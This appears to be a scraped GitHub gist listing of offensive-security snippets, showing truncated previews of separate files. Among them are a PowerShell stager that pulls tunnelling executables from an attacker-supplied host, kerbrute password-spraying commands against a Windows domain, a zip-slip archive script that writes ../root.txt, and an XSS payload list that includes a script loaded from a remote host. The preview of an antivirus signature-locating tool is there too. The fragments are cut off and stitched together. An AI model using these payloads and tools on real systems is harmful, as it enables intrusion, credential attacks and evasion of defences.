param([string]$addr, [string]$port)
wget "http://${addr}:${port}/ssf.exe" -o "ssf.exe"
wget "http://${addr}:${port}/ssfd.exe" -o "ssfd.exe"
mkdir certs
cd certs
wget "http://${addr}:${port}/certs/certificate.crt" -o "certificate.crt"
wget "http://${addr}:${port}/certs/dh4096.pem" -o "dh4096.pem"
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import zipfile | |
import sys | |
import os | |
''' | |
Usage: | |
python zipslip.py xct.zip root.txt ../../../../.. | |
Added ../../../../../root.txt to xct.zip | |
''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// A demonstration example for http://stackoverflow.com/a/26124494 | |
// It runs a goroutine locked to an OS thread on Windows | |
// then impersonates that thread as another user using its name | |
// and plaintext password, then reverts to the default security | |
// context before detaching from its OS thread. | |
package main | |
import ( | |
"log" | |
"runtime" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using NtApiDotNet; | |
using System; | |
using System.Collections.Generic; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Linq; | |
using System.Text; | |
using System.Threading; | |
using System.Threading.Tasks; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
/* | |
Example Go program with multiple .NET Binaries embedded | |
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
$ go get -u github.com/gobuffalo/packr/packr | |
Place all your EXEs are in a "binaries" folder |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Find-AVSignature { | |
<# | |
.SYNOPSIS | |
Find-AVSignature | |
Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com | |
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation) | |
License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Install-WinDbg { | |
param( | |
[switch] $Start | |
) | |
# Change default progress preference (faster downloads) | |
$DefaultProgressPreference = $ProgressPreference | |
$ProgressPreference = 'SilentlyContinue' | |
Write-Host "Downloading windbg.appinstaller (XML manifest file)" |